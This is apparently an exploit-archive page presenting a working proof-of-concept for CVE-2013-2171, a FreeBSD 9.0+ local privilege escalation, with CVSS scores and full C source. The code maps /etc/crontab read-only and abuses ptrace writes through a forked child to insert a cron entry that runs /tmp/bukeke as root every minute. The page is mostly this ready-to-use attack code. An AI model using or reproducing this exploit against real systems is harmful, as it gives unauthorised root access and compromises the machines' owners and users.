FreeBSD 9.0+ Privilege Escalation Exploit

2013.06.24
Credit: SynQ
Risk: High
Local: Yes
Remote: No
CWE: CWE-264


CVSS Base Score: 6.9/10
Impact Subscore: 10/10
Exploitability Subscore: 3.4/10
Exploit range: Local
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

/* * CVE-2013-2171 FreeBSD 9.0+ Privilege escalation via mmap * * poc by SynQ, rdot.org, 6/2013 * * don't forget to cp /etc/crontab /tmp * */ #include <unistd.h> #include <stdio.h> #include <stdlib.h> #include <sys/mman.h> #include <sys/ptrace.h> #include <sys/wait.h> #include <fcntl.h> #include <sys/types.h> char sc[]="*\t*\t*\t*\t*\troot\t/tmp/bukeke\n#"; void child() { int status; status = ptrace(PT_TRACE_ME, 0, 0, 0); if (status != 0) printf("child ptrace error\n"); exit(1); } int main() { int pid, fd, i; char *addr; fd = open("/etc/crontab", O_RDONLY); if (fd<0) { printf("open failed\n"); exit(1); } addr = mmap(0, 4096, PROT_READ, MAP_SHARED, fd, 0); if (addr == MAP_FAILED) { printf("mmap fault\n"); exit(1); } pid = fork(); if (pid == -1) { printf("fork failed\n"); exit(1); } else if (pid == 0) child(); ptrace(PT_ATTACH, pid, 0, 0); if (wait(0) == -1) { printf("wait failed\n"); exit(1); } printf("writing shellcode...\n"); for(i=0; i < sizeof(sc)/4; i++) ptrace(PT_WRITE_D, pid, addr+i*4, *(int*)&sc[i*4]); ptrace(PT_DETACH, pid, 0, 0); if (wait(0) == -1) { printf("wait2 failed\n"); exit(1); } printf("done.\n"); return 0; }

References:

http://cxsecurity.com/issue/WLB-2013060170


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top